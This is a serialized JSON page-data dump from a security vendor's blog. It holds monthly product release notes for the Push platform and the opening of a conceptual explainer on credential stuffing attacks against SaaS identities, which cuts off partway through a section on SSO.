",{"items":284999},[285000],{"sys":285001,"name":18399},{"id":18398},{"items":285003},[285004,285256],{"__typename":1528,"sys":285005,"content":285007,"title":285244,"synopsis":285245,"hashTags":118,"publishedDate":285246,"slug":285247,"tagsCollection":285248,"authorsCollection":285252},{"id":285006},"7sWfgb5DRgKxkemGfySmOG",{"json":285008},{"nodeType":165,"data":285009,"content":285010},{},[285011,285018,285061,285067,285074,285080,285098,285104,285127,285132,285149,285155,285171,285187,285193,285211,285218,285225,285232,285238],{"nodeType":178,"data":285012,"content":285013},{},[285014],{"nodeType":173,"value":220348,"marks":285015,"data":285017},[285016],{"type":370},{},{"nodeType":250,"data":285019,"content":285020},{},[285021,285031,285041,285051],{"nodeType":254,"data":285022,"content":285023},{},[285024],{"nodeType":178,"data":285025,"content":285026},{},[285027],{"nodeType":173,"value":285028,"marks":285029,"data":285030},"Get notified about new SaaS immediately",[],{},{"nodeType":254,"data":285032,"content":285033},{},[285034],{"nodeType":178,"data":285035,"content":285036},{},[285037],{"nodeType":173,"value":285038,"marks":285039,"data":285040},"Jumpstart your risk reviews with app classification",[],{},{"nodeType":254,"data":285042,"content":285043},{},[285044],{"nodeType":178,"data":285045,"content":285046},{},[285047],{"nodeType":173,"value":285048,"marks":285049,"data":285050},"Learn about security findings and fixes right away",[],{},{"nodeType":254,"data":285052,"content":285053},{},[285054],{"nodeType":178,"data":285055,"content":285056},{},[285057],{"nodeType":173,"value":285058,"marks":285059,"data":285060},"Automatically ask end-users to remove dormant integrations",[],{},{"nodeType":235,"data":285062,"content":285063},{},[285064],{"nodeType":173,"value":285028,"marks":285065,"data":285066},[],{},{"nodeType":178,"data":285068,"content":285069},{},[285070],{"nodeType":173,"value":285071,"marks":285072,"data":285073},"Know right away when employees sign up for a new SaaS app that hasn’t been seen in your environment before so you can review and take action sooner. Use ChatOps to notify your security team in Slack or Microsoft Teams when Push observes a new app.",[],{},{"nodeType":312,"data":285075,"content":285079},{"target":285076},{"sys":285077},{"id":285078,"type":317,"linkType":318},"276YlohrXIkLMI2qm03Cdt",[],{"nodeType":178,"data":285081,"content":285082},{},[285083,285086,285095],{"nodeType":173,"value":37,"marks":285084,"data":285085},[],{},{"nodeType":1698,"data":285087,"content":285091},{"target":285088},{"sys":285089},{"id":285090,"type":317,"linkType":318},"c5d84209-6d36-4b68-b37f-27083de98c75",[285092],{"nodeType":173,"value":148770,"marks":285093,"data":285094},[],{},{"nodeType":173,"value":37,"marks":285096,"data":285097},[],{},{"nodeType":235,"data":285099,"content":285100},{},[285101],{"nodeType":173,"value":285038,"marks":285102,"data":285103},[],{},{"nodeType":178,"data":285105,"content":285106},{},[285107,285111,285115,285119,285123],{"nodeType":173,"value":285108,"marks":285109,"data":285110},"Now you can classify SaaS apps directly in the Push platform based on the sensitivity of the data they contain or the permissions they’ve been granted using the ",[],{},{"nodeType":173,"value":156829,"marks":285112,"data":285114},[285113],{"type":370},{},{"nodeType":173,"value":285116,"marks":285117,"data":285118}," field. Then use the ",[],{},{"nodeType":173,"value":156821,"marks":285120,"data":285122},[285121],{"type":370},{},{"nodeType":173,"value":285124,"marks":285125,"data":285126}," option to capture your decision about an app — is it in or out?",[],{},{"nodeType":312,"data":285128,"content":285131},{"target":285129},{"sys":285130},{"id":284258,"type":317,"linkType":318},[],{"nodeType":178,"data":285133,"content":285134},{},[285135,285138,285146],{"nodeType":173,"value":37,"marks":285136,"data":285137},[],{},{"nodeType":1698,"data":285139,"content":285142},{"target":285140},{"sys":285141},{"id":284271,"type":317,"linkType":318},[285143],{"nodeType":173,"value":148770,"marks":285144,"data":285145},[],{},{"nodeType":173,"value":37,"marks":285147,"data":285148},[],{},{"nodeType":235,"data":285150,"content":285151},{},[285152],{"nodeType":173,"value":285048,"marks":285153,"data":285154},[],{},{"nodeType":178,"data":285156,"content":285157},{},[285158,285162,285167],{"nodeType":173,"value":285159,"marks":285160,"data":285161},"Enable the new ChatOps topic for ",[],{},{"nodeType":173,"value":285163,"marks":285164,"data":285166},"Security findings",[285165],{"type":370},{},{"nodeType":173,"value":285168,"marks":285169,"data":285170}," to notify your team when Push observes a new security issue — and when an employee resolves it 🎉",[],{},{"nodeType":178,"data":285172,"content":285173},{},[285174,285178,285183],{"nodeType":173,"value":285175,"marks":285176,"data":285177},"In the Push admin console, go to ",[],{},{"nodeType":173,"value":285179,"marks":285180,"data":285182},"ChatOps > Security team notifications",[285181],{"type":370},{},{"nodeType":173,"value":285184,"marks":285185,"data":285186}," and toggle on which security findings you want to get notified about.",[],{},{"nodeType":312,"data":285188,"content":285192},{"target":285189},{"sys":285190},{"id":285191,"type":317,"linkType":318},"4JvqgTyin52RcaDWQn6KOd",[],{"nodeType":178,"data":285194,"content":285195},{},[285196,285199,285208],{"nodeType":173,"value":37,"marks":285197,"data":285198},[],{},{"nodeType":1698,"data":285200,"content":285204},{"target":285201},{"sys":285202},{"id":285203,"type":317,"linkType":318},"3qpazt5rHzRGiJhArYva5k",[285205],{"nodeType":173,"value":148770,"marks":285206,"data":285207},[],{},{"nodeType":173,"value":37,"marks":285209,"data":285210},[],{},{"nodeType":235,"data":285212,"content":285213},{},[285214],{"nodeType":173,"value":285215,"marks":285216,"data":285217},"Automatically ask users to remove dormant apps ",[],{},{"nodeType":178,"data":285219,"content":285220},{},[285221],{"nodeType":173,"value":285222,"marks":285223,"data":285224},"Tidying up is easier now. Use ChatOps to ask employees if they still need an integration that they haven’t used in 90 days. If they don’t need it, they can remove it directly via the chat message.",[],{},{"nodeType":178,"data":285226,"content":285227},{},[285228],{"nodeType":173,"value":285229,"marks":285230,"data":285231},"That’s one less risk you need to worry about.",[],{},{"nodeType":312,"data":285233,"content":285237},{"target":285234},{"sys":285235},{"id":285236,"type":317,"linkType":318},"4DAiff8oOGhyvYGBGDFEXa",[],{"nodeType":178,"data":285239,"content":285240},{},[285241],{"nodeType":173,"value":37,"marks":285242,"data":285243},[],{},"Product release: July 2023","Here’s what’s new on the Push platform for July 2023.","2023-07-31T00:00:00.000Z","product-release-july-2023",{"items":285249},[285250],{"sys":285251,"name":18399},{"id":18398},{"items":285253},[285254],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":285255},{"url":19129},{"__typename":1528,"sys":285257,"content":285259,"title":285598,"synopsis":285599,"hashTags":118,"publishedDate":285600,"slug":285601,"tagsCollection":285602,"authorsCollection":285606},{"id":285258},"TvLJcOLVztKAVVxKRwhuX",{"json":285260},{"data":285261,"content":285262,"nodeType":165},{},[285263,285270,285323,285329,285359,285366,285372,285388,285394,285413,285419,285436,285443,285470,285476,285493,285499,285515,285521,285538,285545,285575,285581],{"data":285264,"content":285265,"nodeType":235},{},[285266],{"data":285267,"marks":285268,"value":285269,"nodeType":173},{},[],"Here's what’s new on the Push platform this month:",{"data":285271,"content":285272,"nodeType":250},{},[285273,285283,285293,285303,285313],{"data":285274,"content":285275,"nodeType":254},{},[285276],{"data":285277,"content":285278,"nodeType":178},{},[285279],{"data":285280,"marks":285281,"value":285282,"nodeType":173},{},[],"Remove problematic third-party integrations",{"data":285284,"content":285285,"nodeType":254},{},[285286],{"data":285287,"content":285288,"nodeType":178},{},[285289],{"data":285290,"marks":285291,"value":285292,"nodeType":173},{},[],"Immediately pinpoint security issues",{"data":285294,"content":285295,"nodeType":254},{},[285296],{"data":285297,"content":285298,"nodeType":178},{},[285299],{"data":285300,"marks":285301,"value":285302,"nodeType":173},{},[],"See who’s using a password manager (or not)",{"data":285304,"content":285305,"nodeType":254},{},[285306],{"data":285307,"content":285308,"nodeType":178},{},[285309],{"data":285310,"marks":285311,"value":285312,"nodeType":173},{},[],"Easily license new employees",{"data":285314,"content":285315,"nodeType":254},{},[285316],{"data":285317,"content":285318,"nodeType":178},{},[285319],{"data":285320,"marks":285321,"value":285322,"nodeType":173},{},[],"New Help Center launched",{"data":285324,"content":285325,"nodeType":235},{},[285326],{"data":285327,"marks":285328,"value":285282,"nodeType":173},{},[],{"data":285330,"content":285331,"nodeType":178},{},[285332,285335,285343,285347,285356],{"data":285333,"marks":285334,"value":65284,"nodeType":173},{},[],{"data":285336,"content":285338,"nodeType":186},{"uri":285337},"https://pushsecurity.com/help/audience/administrators/docs/view-saas-apps-and-employee-activity#delete-third-party-integrations",[285339],{"data":285340,"marks":285341,"value":285342,"nodeType":173},{},[],"delete third-party integrations",{"data":285344,"marks":285345,"value":285346,"nodeType":173},{},[]," directly within the Push platform or ",{"data":285348,"content":285351,"nodeType":1698},{"target":285349},{"sys":285350},{"id":285090,"type":317,"linkType":318},[285352],{"data":285353,"marks":285354,"value":285355,"nodeType":173},{},[],"via ChatOps",{"data":285357,"marks":285358,"value":1477,"nodeType":173},{},[],{"data":285360,"content":285361,"nodeType":178},{},[285362],{"data":285363,"marks":285364,"value":285365,"nodeType":173},{},[],"Find a dormant, unapproved, or otherwise problematic integration? Remove it with a couple clicks because deleting is caring.",{"data":285367,"content":285371,"nodeType":312},{"target":285368},{"sys":285369},{"id":285370,"type":317,"linkType":318},"51TpD6V7z9yKUahovf9rrr",[],{"data":285373,"content":285374,"nodeType":178},{},[285375,285378,285385],{"data":285376,"marks":285377,"value":37,"nodeType":173},{},[],{"data":285379,"content":285380,"nodeType":186},{"uri":285337},[285381],{"data":285382,"marks":285383,"value":148770,"nodeType":173},{},[285384],{"type":370},{"data":285386,"marks":285387,"value":37,"nodeType":173},{},[],{"data":285389,"content":285390,"nodeType":235},{},[285391],{"data":285392,"marks":285393,"value":285292,"nodeType":173},{},[],{"data":285395,"content":285396,"nodeType":178},{},[285397,285401,285409],{"data":285398,"marks":285399,"value":285400,"nodeType":173},{},[],"Identify security findings quickly on the redesigned ",{"data":285402,"content":285404,"nodeType":186},{"uri":285403},"https://pushsecurity.com/app/saas/",[285405],{"data":285406,"marks":285407,"value":285408,"nodeType":173},{},[],"SaaS page",{"data":285410,"marks":285411,"value":285412,"nodeType":173},{},[]," and drill down into the findings with quick filters. Just like on the account security and third-party integrations pages, you can also export the data to CSV or JSON format to take a closer look. ",{"data":285414,"content":285418,"nodeType":312},{"target":285415},{"sys":285416},{"id":285417,"type":317,"linkType":318},"1Sh8y0ujx1HIMAFqELcotE",[],{"data":285420,"content":285421,"nodeType":178},{},[285422,285425,285433],{"data":285423,"marks":285424,"value":37,"nodeType":173},{},[],{"data":285426,"content":285428,"nodeType":186},{"uri":285427},"https://pushsecurity.com/help/audience/administrators/docs/view-saas-apps-and-employee-activity#view-saas-usage-details",[285429],{"data":285430,"marks":285431,"value":148770,"nodeType":173},{},[285432],{"type":370},{"data":285434,"marks":285435,"value":37,"nodeType":173},{},[],{"data":285437,"content":285438,"nodeType":235},{},[285439],{"data":285440,"marks":285441,"value":285442,"nodeType":173},{},[],"See who’s using a password manager — and who’s not",{"data":285444,"content":285445,"nodeType":178},{},[285446,285450,285458,285462,285466],{"data":285447,"marks":285448,"value":285449,"nodeType":173},{},[],"Try a new ",{"data":285451,"content":285453,"nodeType":186},{"uri":285452},"https://pushsecurity.com/app/settings/labs/",[285454],{"data":285455,"marks":285456,"value":285457,"nodeType":173},{},[],"Push Labs",{"data":285459,"marks":285460,"value":285461,"nodeType":173},{},[]," early-access feature to identify employees who are manually typing their passwords, and therefore probably not using a password manager. Go to ",{"data":285463,"marks":285464,"value":18734,"nodeType":173},{},[285465],{"type":370},{"data":285467,"marks":285468,"value":285469,"nodeType":173},{},[]," in the Push admin console to enable the feature.",{"data":285471,"content":285475,"nodeType":312},{"target":285472},{"sys":285473},{"id":285474,"type":317,"linkType":318},"58qldhClKmGP47B5lxFPfA",[],{"data":285477,"content":285478,"nodeType":178},{},[285479,285482,285490],{"data":285480,"marks":285481,"value":37,"nodeType":173},{},[],{"data":285483,"content":285485,"nodeType":186},{"uri":285484},"https://app.arcade.software/share/vl4ojOl1u2x0ubthLhNY",[285486],{"data":285487,"marks":285488,"value":148770,"nodeType":173},{},[285489],{"type":370},{"data":285491,"marks":285492,"value":37,"nodeType":173},{},[],{"data":285494,"content":285495,"nodeType":235},{},[285496],{"data":285497,"marks":285498,"value":285312,"nodeType":173},{},[],{"data":285500,"content":285501,"nodeType":178},{},[285502,285506,285511],{"data":285503,"marks":285504,"value":285505,"nodeType":173},{},[],"You can now check the ",{"data":285507,"marks":285508,"value":285510,"nodeType":173},{},[285509],{"type":370},"First seen",{"data":285512,"marks":285513,"value":285514,"nodeType":173},{},[]," column to identify employees who’ve recently joined your synced workspace so you can license them in Push.",{"data":285516,"content":285520,"nodeType":312},{"target":285517},{"sys":285518},{"id":285519,"type":317,"linkType":318},"2gpEGKbRFK8PLKPTfkDamu",[],{"data":285522,"content":285523,"nodeType":178},{},[285524,285527,285535],{"data":285525,"marks":285526,"value":37,"nodeType":173},{},[],{"data":285528,"content":285530,"nodeType":186},{"uri":285529},"https://pushsecurity.com/help/audience/administrators/docs/add-employees#start",[285531],{"data":285532,"marks":285533,"value":148770,"nodeType":173},{},[285534],{"type":370},{"data":285536,"marks":285537,"value":37,"nodeType":173},{},[],{"data":285539,"content":285540,"nodeType":235},{},[285541],{"data":285542,"marks":285543,"value":285544,"nodeType":173},{},[],"Push knowledge on demand",{"data":285546,"content":285547,"nodeType":178},{},[285548,285552,285559,285563,285571],{"data":285549,"marks":285550,"value":285551,"nodeType":173},{},[],"Search our new ",{"data":285553,"content":285555,"nodeType":186},{"uri":285554},"https://pushsecurity.com/help/audience/administrators",[285556],{"data":285557,"marks":285558,"value":3262,"nodeType":173},{},[],{"data":285560,"marks":285561,"value":285562,"nodeType":173},{},[]," to find answers to common configuration and troubleshooting questions, and to find setup instructions and details on key features of the Push platform. You can also find a ",{"data":285564,"content":285566,"nodeType":186},{"uri":285565},"https://pushsecurity.com/help/audience/employees/docs/what-is-push",[285567],{"data":285568,"marks":285569,"value":285570,"nodeType":173},{},[],"guide for employees",{"data":285572,"marks":285573,"value":285574,"nodeType":173},{},[]," with answers to end-user questions.",{"data":285576,"content":285580,"nodeType":312},{"target":285577},{"sys":285578},{"id":285579,"type":317,"linkType":318},"sob4Nr8xsSuIK1L9QFENj",[],{"data":285582,"content":285583,"nodeType":178},{},[285584,285587,285595],{"data":285585,"marks":285586,"value":37,"nodeType":173},{},[],{"data":285588,"content":285589,"nodeType":186},{"uri":285554},[285590],{"data":285591,"marks":285592,"value":285594,"nodeType":173},{},[285593],{"type":370},"Visit the Help Center",{"data":285596,"marks":285597,"value":37,"nodeType":173},{},[],"Product Release: June 2023","Here’s what’s new on the Push platform for June 2023.","2023-06-02T00:00:00.000Z","product-release-june-2023",{"items":285603},[285604],{"sys":285605,"name":18399},{"id":18398},{"items":285607},[285608],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":285609},{"url":19129},{"items":285611},[285612],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":285613},{"url":19129},{"json":285615,"links":285755},{"nodeType":165,"data":285616,"content":285617},{},[285618,285624,285630,285650,285663,285668,285685,285691,285697,285702,285708,285721,285726,285743,285749],{"nodeType":178,"data":285619,"content":285620},{},[285621],{"nodeType":173,"value":273033,"marks":285622,"data":285623},[],{},{"nodeType":235,"data":285625,"content":285626},{},[285627],{"nodeType":173,"value":273040,"marks":285628,"data":285629},[],{},{"nodeType":178,"data":285631,"content":285632},{},[285633,285636,285640,285643,285647],{"nodeType":173,"value":273047,"marks":285634,"data":285635},[],{},{"nodeType":173,"value":71552,"marks":285637,"data":285639},[285638],{"type":370},{},{"nodeType":173,"value":273055,"marks":285641,"data":285642},[],{},{"nodeType":173,"value":273059,"marks":285644,"data":285646},[285645],{"type":370},{},{"nodeType":173,"value":273064,"marks":285648,"data":285649},[],{},{"nodeType":178,"data":285651,"content":285652},{},[285653,285656,285660],{"nodeType":173,"value":273071,"marks":285654,"data":285655},[],{},{"nodeType":173,"value":273075,"marks":285657,"data":285659},[285658],{"type":370},{},{"nodeType":173,"value":273064,"marks":285661,"data":285662},[],{},{"nodeType":312,"data":285664,"content":285667},{"target":285665},{"sys":285666},{"id":273086,"type":317,"linkType":318},[],{"nodeType":178,"data":285669,"content":285670},{},[285671,285674,285682],{"nodeType":173,"value":37,"marks":285672,"data":285673},[],{},{"nodeType":1698,"data":285675,"content":285678},{"target":285676},{"sys":285677},{"id":273098,"type":317,"linkType":318},[285679],{"nodeType":173,"value":18605,"marks":285680,"data":285681},[],{},{"nodeType":173,"value":37,"marks":285683,"data":285684},[],{},{"nodeType":235,"data":285686,"content":285687},{},[285688],{"nodeType":173,"value":273110,"marks":285689,"data":285690},[],{},{"nodeType":178,"data":285692,"content":285693},{},[285694],{"nodeType":173,"value":273117,"marks":285695,"data":285696},[],{},{"nodeType":312,"data":285698,"content":285701},{"target":285699},{"sys":285700},{"id":273124,"type":317,"linkType":318},[],{"nodeType":235,"data":285703,"content":285704},{},[285705],{"nodeType":173,"value":273130,"marks":285706,"data":285707},[],{},{"nodeType":178,"data":285709,"content":285710},{},[285711,285714,285718],{"nodeType":173,"value":273137,"marks":285712,"data":285713},[],{},{"nodeType":173,"value":273141,"marks":285715,"data":285717},[285716],{"type":370},{},{"nodeType":173,"value":273146,"marks":285719,"data":285720},[],{},{"nodeType":312,"data":285722,"content":285725},{"target":285723},{"sys":285724},{"id":273153,"type":317,"linkType":318},[],{"nodeType":178,"data":285727,"content":285728},{},[285729,285732,285740],{"nodeType":173,"value":37,"marks":285730,"data":285731},[],{},{"nodeType":1698,"data":285733,"content":285736},{"target":285734},{"sys":285735},{"id":273165,"type":317,"linkType":318},[285737],{"nodeType":173,"value":18605,"marks":285738,"data":285739},[],{},{"nodeType":173,"value":37,"marks":285741,"data":285742},[],{},{"nodeType":178,"data":285744,"content":285745},{},[285746],{"nodeType":173,"value":13836,"marks":285747,"data":285748},[],{},{"nodeType":178,"data":285750,"content":285751},{},[285752],{"nodeType":173,"value":37,"marks":285753,"data":285754},[],{},{"entries":285756},{"inline":285757,"hyperlink":285758,"block":285769},[],[285759,285764],{"sys":285760,"__typename":6655,"title":285761,"slug":285762,"articleId":285763},{"id":273098},"Can I specify an owner for a SaaS app in the Push platform?","can-i-specify-an-owner-for-a-saas-app-in-the-push-platform",10097,{"sys":285765,"__typename":6655,"title":285766,"slug":285767,"articleId":285768},{"id":273165},"How do I ignore service accounts or other unlicensed accounts in Push?","how-do-i-ignore-service-accounts-or-other-unlicensed-accounts-in-push",10096,[285770,285775,285780],{"sys":285771,"__typename":5345,"title":285772,"caption":118,"layoutMode":118,"file":285773},{"id":273086},"Owner field gif - release notes - September 2023",{"url":285774,"width":273005,"height":272718},"https://images.ctfassets.net/y1cdw1ablpvd/GDBUZ8TrwZba05JtvzRco/c3aab8ae12b7b99c00b8917dfd708c43/app_owner_demo.gif",{"sys":285776,"__typename":5345,"title":285777,"caption":118,"layoutMode":118,"file":285778},{"id":273124},"App description gif - release notes - September 2023",{"url":285779,"width":273005,"height":272718},"https://images.ctfassets.net/y1cdw1ablpvd/iZuMyQb2Ew7zfknMWjPvL/10c396d74601f125d0ad18bdacb39ab3/app_descriptions_demo.gif",{"sys":285781,"__typename":5345,"title":285782,"caption":118,"layoutMode":118,"file":285783},{"id":273153},"Hide unlicensed employees gif - release notes - September 2023",{"url":285784,"width":273005,"height":272718},"https://images.ctfassets.net/y1cdw1ablpvd/601O76HygmvL800AhOJAQu/e33ee652396d6ed47e18f6be021d617c/hide_unlicensed_demo.gif","content:blog:product-release-september-2023.json","blog/product-release-september-2023.json","blog/product-release-september-2023",{"_path":285789,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":285790,"ogImage":118,"summary":285793,"relatedBlogPostsCollection":285804,"title":285806,"subtitle":118,"metaTitle":285807,"synopsis":285808,"hashTags":118,"publishedDate":285809,"slug":285810,"tagsCollection":285811,"authorsCollection":285817,"content":285821,"_id":286482,"_type":5439,"_source":5440,"_file":286483,"_stem":286484,"_extension":5439},"/blog/what-is-credential-stuffing",{"id":285791,"publishedAt":285792},"7DtkTPaOVWOkprmz3f7RKG","2026-01-30T09:33:23.041Z",{"json":285794},{"data":285795,"content":285796,"nodeType":165},{},[285797],{"data":285798,"content":285799,"nodeType":178},{},[285800],{"data":285801,"marks":285802,"value":285803,"nodeType":173},{},[],"Credential stuffing attacks occur when attackers use tools that automate the process of taking a list of breached passwords / stolen user credentials (from public password dumps) and retargeting those compromised credentials against different apps. ",{"items":285805},[],"Credential stuffing: The most common attack against SaaS identities ","Credential stuffing: the most common identities attack  ","Credential stuffing attacks are incredibly common, but they often go undetected. These attacks are often the entry point for attack. Learn how to prevent them.","2023-09-25T00:00:00.000Z","what-is-credential-stuffing",{"items":285812},[285813,285815],{"sys":285814,"name":505},{"id":504},{"sys":285816,"name":26137},{"id":26136},{"items":285818},[285819],{"fullName":273632,"firstName":273633,"jobTitle":273634,"profilePicture":285820},{"url":273636},{"json":285822,"links":286438},{"nodeType":165,"data":285823,"content":285824},{},[285825,285831,285838,285845,285852,285859,285866,285873,285879,285886,285893,285900,285906,285913,285920,285939,285955,285981,285988,285995,286002,286009,286016,286023,286030,286037,286061,286068,286081,286088,286095,286102,286109,286116,286122,286129,286226,286236,286242,286249,286256,286263,286270,286277,286284,286291,286298,286304,286311,286318,286325,286332,286339,286346,286389,286395,286427,286432],{"nodeType":169,"data":285826,"content":285827},{},[285828],{"nodeType":173,"value":258287,"marks":285829,"data":285830},[],{},{"nodeType":178,"data":285832,"content":285833},{},[285834],{"nodeType":173,"value":285835,"marks":285836,"data":285837},"When it comes to protecting your data and third-party risk management, we often hear about supply chain attacks, which are all those attacks that target a trusted supplier used by many organizations. ",[],{},{"nodeType":178,"data":285839,"content":285840},{},[285841],{"nodeType":173,"value":285842,"marks":285843,"data":285844},"We hear about these attacks in the press because supply chain attacks have such a wide blast radius. They might start with a platform that many organizations use for business (Salesforce, for example). If that SaaS platform is compromised, every company’s data is compromised, including your own. ",[],{},{"nodeType":235,"data":285846,"content":285847},{},[285848],{"nodeType":173,"value":285849,"marks":285850,"data":285851},"You have some control over this risk, but there are limitations",[],{},{"nodeType":178,"data":285853,"content":285854},{},[285855],{"nodeType":173,"value":285856,"marks":285857,"data":285858},"You can’t prevent supply chain attacks against your sub-processors or vendors, instead you’re stuck simply auditing the third parties you work with in order to verify they can be trusted enough that you’re comfortable using them and giving them access to your data and systems. ",[],{},{"nodeType":178,"data":285860,"content":285861},{},[285862],{"nodeType":173,"value":285863,"marks":285864,"data":285865},"Not the best, but great…this is the reality of doing security in the cloud. The good news is that supply chain attacks are pretty rare (at least today). What you do have control over (and in fact are responsible for) is the security of your organization’s identities in cloud applications. By doing this well you can prevent the most common attack against online applications.",[],{},{"nodeType":169,"data":285867,"content":285868},{},[285869],{"nodeType":173,"value":285870,"marks":285871,"data":285872},"What is credential stuffing?",[],{},{"nodeType":312,"data":285874,"content":285878},{"target":285875},{"sys":285876},{"id":285877,"type":317,"linkType":318},"5D7DWdaDQ6KWgnOR8YCDgg",[],{"nodeType":178,"data":285880,"content":285881},{},[285882],{"nodeType":173,"value":285883,"marks":285884,"data":285885},"Credential stuffing attacks occur when attackers use tools that automate the process of taking a list of breached passwords / stolen credentials (from public password dumps) and retargeting those compromised credentials against different apps and user accounts. ",[],{},{"nodeType":178,"data":285887,"content":285888},{},[285889],{"nodeType":173,"value":285890,"marks":285891,"data":285892},"If you’re familiar with password spraying, credential stuffing is the more effective version. With credential stuffing, the attacker already has a list of stolen credentials and identities to target instead of having to resort to blindly spraying guessed usernames and passwords against multiple sites and user accounts and praying for the attack to hit a target and gain unauthorized access or attempt account takeover.",[],{},{"nodeType":169,"data":285894,"content":285895},{},[285896],{"nodeType":173,"value":285897,"marks":285898,"data":285899},"How credential stuffing attacks work",[],{},{"nodeType":312,"data":285901,"content":285905},{"target":285902},{"sys":285903},{"id":285904,"type":317,"linkType":318},"o6eDG116P2tdWdq4oNllR",[],{"nodeType":178,"data":285907,"content":285908},{},[285909],{"nodeType":173,"value":285910,"marks":285911,"data":285912},"In the example for acme.com in the graphic above, we see how this credential stuffing attack plays out to get access to acme.com’s Mailchimp account because the user re-used their Mailchimp password on another (previously breached) app. At this point, attackers are able to start sending scam emails to acme.com’s customers from their domain, it looks completely legit because it is. ",[],{},{"nodeType":169,"data":285914,"content":285915},{},[285916],{"nodeType":173,"value":285917,"marks":285918,"data":285919},"Prevalence of credential stuffing attacks",[],{},{"nodeType":178,"data":285921,"content":285922},{},[285923,285927,285936],{"nodeType":173,"value":285924,"marks":285925,"data":285926},"Microsoft’s Director of Identity Standards, Pamela Dingle said ",[],{},{"nodeType":186,"data":285928,"content":285930},{"uri":285929},"https://www.linkedin.com/pulse/navigating-ever-evolving-authentication-landscape-pamela-dingle/",[285931],{"nodeType":173,"value":285932,"marks":285933,"data":285935},"in a recent article",[285934],{"type":194},{},{"nodeType":173,"value":115059,"marks":285937,"data":285938},[],{},{"nodeType":178,"data":285940,"content":285941},{},[285942,285946,285951],{"nodeType":173,"value":285943,"marks":285944,"data":285945},"“...as of October 2022, ",[],{},{"nodeType":173,"value":285947,"marks":285948,"data":285950},"Microsoft blocks 1,287 password attacks every second across our platform",[285949],{"type":370},{},{"nodeType":173,"value":285952,"marks":285953,"data":285954},"…aka credential stuffing: Passwords are hard to remember, so passengers reuse them. Once attackers crack a password on a low-security site, they replay the same password on your high-security login page.” Dingle cited Microsoft Azure AD authentication log data for her stat.",[],{},{"nodeType":178,"data":285956,"content":285957},{},[285958,285962,285969,285973,285978],{"nodeType":173,"value":285959,"marks":285960,"data":285961},"Auth0 ",[],{},{"nodeType":186,"data":285963,"content":285964},{"uri":208861},[285965],{"nodeType":173,"value":280566,"marks":285966,"data":285968},[285967],{"type":194},{},{"nodeType":173,"value":285970,"marks":285971,"data":285972}," that ",[],{},{"nodeType":173,"value":285974,"marks":285975,"data":285977},"credential stuffing accounts for 34% of overall traffic/authentication events on their platform",[285976],{"type":370},{},{"nodeType":173,"value":197,"marks":285979,"data":285980},[],{},{"nodeType":235,"data":285982,"content":285983},{},[285984],{"nodeType":173,"value":285985,"marks":285986,"data":285987},"Credential stuffing attacks are rarely reported",[],{},{"nodeType":178,"data":285989,"content":285990},{},[285991],{"nodeType":173,"value":285992,"marks":285993,"data":285994},"These attacks are incredibly common, but it’s difficult to detect credential stuffing attacks. If you ask anyone working in incident response, they’ll confirm that credential stuffing attacks are often the entry point for attack. ",[],{},{"nodeType":178,"data":285996,"content":285997},{},[285998],{"nodeType":173,"value":285999,"marks":286000,"data":286001},"However, these credential stuffing attacks are often not reported as such because no organization who’s been victimized and experienced a data breach wants to admit the attack was as “basic” as a credential stuffing attack. Instead, they’d prefer to say they were a victim of an advanced nation-state level threat actor. ",[],{},{"nodeType":178,"data":286003,"content":286004},{},[286005],{"nodeType":173,"value":286006,"marks":286007,"data":286008},"The attacks that actually have a big impact on business are often the ones that target the low-hanging fruit as a starting point. And if you can automate those attacks, even better from the attacker’s point of view.",[],{},{"nodeType":178,"data":286010,"content":286011},{},[286012],{"nodeType":173,"value":286013,"marks":286014,"data":286015},"So, credential stuffing attacks are effective and incredibly common, but why is it more relevant now than ever?",[],{},{"nodeType":169,"data":286017,"content":286018},{},[286019],{"nodeType":173,"value":286020,"marks":286021,"data":286022},"Employees creating identities means more opportunities for attackers",[],{},{"nodeType":178,"data":286024,"content":286025},{},[286026],{"nodeType":173,"value":286027,"marks":286028,"data":286029},"There’s been a massive shift in how organizations’ attack surfaces are growing and adapting, and that’s because employees are signing up for software to get their work done, and creating new identities as they go.",[],{},{"nodeType":178,"data":286031,"content":286032},{},[286033],{"nodeType":173,"value":286034,"marks":286035,"data":286036},"Don’t think it’s happening in your company? Just because you don’t see it, doesn’t mean it isn’t happening and you can have the most stringent policies possible, but employees will often find a way to work around them just to get access to the tools that make their jobs easier.",[],{},{"nodeType":3769,"data":286038,"content":286039},{},[286040],{"nodeType":178,"data":286041,"content":286042},{},[286043,286048,286058],{"nodeType":173,"value":286044,"marks":286045,"data":286047},"80% of workers admit to using SaaS applications at work ",[286046],{"type":370},{},{"nodeType":186,"data":286049,"content":286051},{"uri":286050},"https://track.g2.com/resources/shadow-it-statistics#:~:text=35%25%20of%20employees%20say%20they,collaboration%20tools%20into%20an%20organization",[286052],{"nodeType":173,"value":286053,"marks":286054,"data":286057},"without getting approval from IT",[286055,286056],{"type":194},{"type":370},{},{"nodeType":173,"value":37,"marks":286059,"data":286060},[],{},{"nodeType":178,"data":286062,"content":286063},{},[286064],{"nodeType":173,"value":286065,"marks":286066,"data":286067},"The increase in employee-adopted apps has led to employees creating more accounts and identities, on more apps and without the guiding hand of security to make sure strong identity and access controls are in place. ",[],{},{"nodeType":178,"data":286069,"content":286070},{},[286071,286077],{"nodeType":173,"value":286072,"marks":286073,"data":286076},"Opportunistic attackers now have a huge, unmonitored attack surface to target using low effort/cost techniques that generate reliable results for them",[286074,286075],{"type":370},{"type":1646},{},{"nodeType":173,"value":10557,"marks":286078,"data":286080},[286079],{"type":1646},{},{"nodeType":169,"data":286082,"content":286083},{},[286084],{"nodeType":173,"value":286085,"marks":286086,"data":286087},"Won’t SSO solve this? ",[],{},{"nodeType":178,"data":286089,"content":286090},{},[286091],{"nodeType":173,"value":286092,"marks":286093,"data":286094},"It helps, but it’s not available for most apps.",[],{},{"nodeType":178,"data":286096,"content":286097},{},[286098],{"nodeType":173,"value":286099,"marks":286100,"data":286101},"Many security teams are leaning on single sign-on (SSO) to address this issue. They’ll require that apps used in their company use SSO, specifically SAML (Security Assertion Markup Language) before they can be approved or used. This works really well for the apps that provide this functionality and it’s the gold standard for authentication. ",[],{},{"nodeType":178,"data":286103,"content":286104},{},[286105],{"nodeType":173,"value":286106,"marks":286107,"data":286108},"With SAML SSO, there’s just one account, just one password, and you can centrally deprovision accounts when employees leave the organization. You’re probably already paying for a SAML 